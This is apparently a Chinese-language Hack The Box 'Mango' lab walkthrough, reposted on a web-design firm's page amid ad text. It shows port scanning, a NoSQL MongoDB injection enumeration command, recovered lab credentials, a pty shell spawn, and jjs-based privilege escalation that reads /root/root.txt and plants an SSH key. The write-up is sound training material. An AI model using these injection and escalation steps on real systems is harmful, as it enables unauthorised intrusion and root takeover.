189 8069 5689

HTBMango的渗透测试实例

这篇文章主要讲解了“HTB Mango的渗透测试实例”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“HTB Mango的渗透测试实例”吧!

这篇文章主要讲解了“HTB Mango的渗透测试实例”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“HTB Mango的渗透测试实例”吧!

前言

10年积累的网站制作、成都网站建设经验,可以快速应对客户对网站的新想法和需求。提供各种问题对应的解决方案。让选择我们的客户得到更好、更有力的网络服务。我虽然不认识你,你也不认识我。但先建设网站后付款的网站建设流程,更有长治免费网站建设让你可以放心的选择与我们合作。

本次演练使用kali系统按照渗透测试的过程进行操作,通过前期的信息收集与普通注入不能获取到有用的信息,通过谷歌诸侯知道,可以利用 --injection爬取账号与密码,使用ssh远程连接获取user.txt最终通过提权获取root.txt。

一、信息收集1、靶机ip

ip地址为:10.129.1.219

2、靶机端口与服务nmap -sV -A -O 10.129.1.219

获取到开放端口与版本信息并且获得了正在使用的域名信息

PORT    STATE SERVICE  VERSION22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))3、网站信息收集
查看80与443端口

发现443端口是一个类似于谷歌的搜索界面通过证书获得一些信息

二、漏洞探测与利用Nosql-MongoDB-injection
将重点放在80端口,这个端口是一个登录界面,经过尝试通过普通的sql注入无法爬取到有用的信息
通过谷歌发现存在Nosql-MongoDB-injection可以利用脚本进行注入尝试获取账号与密码

链接:https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration

python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep username -op login:login,submit:submitpython3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep password -op login:login,submit:submit
用户:admin 密码:t9KcS3>!0B#2

用户:mango 密码:h4mXK8RhU~f{]f5H
使用获得的账号密码进行登录
无论使用哪一个都会跳转到这个界面

通过ssh进行远程连接 并跳转到admin用户,否则无法查看到admin文件夹下的user.txt

三、提权

获取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'
使用LinEnum.sh查看是否存在可利用信息
最终根据提示找到了jjs可以利用jjs进行提权
使用GTFOBins 查看可利用脚本
链接:https://gtfobins.github.io/

(1) 通过运行文件读取命令直接获得root.txt

var BufferedReader = Java.type("java.io.BufferedReader");var FileReader = Java.type("java.io.FileReader");var br = new BufferedReader(new FileReader("/root/root.txt"));while ((line = br.readLine()) != null) { print(line); }

(2) 通过jjs上传我们自己生成的ssh公钥然后使用我们自己的私钥进行连接获取root权限

ssh-keygen

完善脚本信息

echo 'var FileWriter = Java.type("java.io.FileWriter");var fw=new FileWriter("./file_to_write");fw.write("DATA");fw.close();' | jjs

在获取的shell中执行脚本最后在kali中进行登录获取root权限


网页题目:HTBMango的渗透测试实例
浏览路径:http://jkwzsj.com/article/soodsi.html

其他资讯